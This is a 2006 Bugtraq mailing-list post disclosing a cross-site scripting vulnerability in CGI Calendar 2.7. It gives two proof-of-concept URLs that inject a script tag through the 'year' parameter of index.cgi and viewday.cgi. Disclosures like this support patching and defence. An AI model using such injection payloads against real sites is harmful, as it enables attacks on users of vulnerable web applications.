[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CGI Calendar XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CGI Calendar XSS Vulnerability
From: revnic@xxxxxxxxx
Date: 26 Feb 2006 21:32:31 -0000

CGI Calendar XSS Vulnerability


Software: CGI Calendar
Version: 2.7
http://cgicalendar.sourceforge.net/

Description: an online calendar implemented using CGI technology

Vulnerability: Cross-Site Scripting

Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

Credit:
Discovered by Revnic Vasile
revnic@xxxxxxxxx

Prev by Date: 2 SQL Injection in Fantastic News
Next by Date: Re: [eVuln] Vanilla Guestbook Multiple XSS & SQL Injection Vulnerabilities
Previous by thread: 2 SQL Injection in Fantastic News
Next by thread: Secunia Research: ArGoSoft Mail Server Pro viewheaders Script Insertion
Index(es):
- Date
- Thread